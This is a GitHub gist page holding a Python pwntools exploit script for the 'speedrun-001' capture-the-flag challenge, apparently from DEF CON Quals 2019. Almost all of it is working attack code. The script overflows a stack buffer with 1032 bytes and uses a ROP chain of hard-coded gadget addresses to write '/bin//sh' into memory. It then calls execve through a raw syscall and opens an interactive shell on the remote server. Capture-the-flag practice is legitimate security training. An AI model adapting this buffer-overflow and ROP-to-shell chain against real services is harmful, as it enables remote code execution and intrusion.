Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/env python
from pwn import *
import time
def main():
# conn = process("./speedrun-001")
conn = remote("speedrun-001.quals2019.oooverflow.io", 31337)
# conn = remote("localhost", 3000)
bss_addr = 0x6bbae0
pop_rdx_ret = 0x4498b5 # pop rdx ; ret
pop_rsi_ret = 0x4101f3 # pop rsi ; ret
pop_rdi_ret = 0x400686 # pop rdi ; ret
syscall_ret = 0x474e65 # syscall ; ret
mov_rax_rdi_ret = 0x4129c3 # mov rax, rdi ; ret
read_addr = 0x4498a0
binsh = "/bin//sh\x00"
# read /bin//sh
payload = "A" * 1032
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(pop_rsi_ret)
payload += p64(bss_addr)
payload += p64(pop_rdx_ret)
payload += p64(9)
payload += p64(read_addr)
# execve
payload += p64(pop_rdi_ret)
payload += p64(59) # system
payload += p64(mov_rax_rdi_ret)
payload += p64(pop_rdi_ret)
payload += p64(bss_addr)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(pop_rdx_ret)
payload += p64(0)
payload += p64(syscall_ret)
payload += p64(0xdeadbeef)
print conn.recvuntil("Any last words?\n")
conn.sendline(payload)
time.sleep(0.1)
conn.sendline(binsh)
conn.interactive()
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.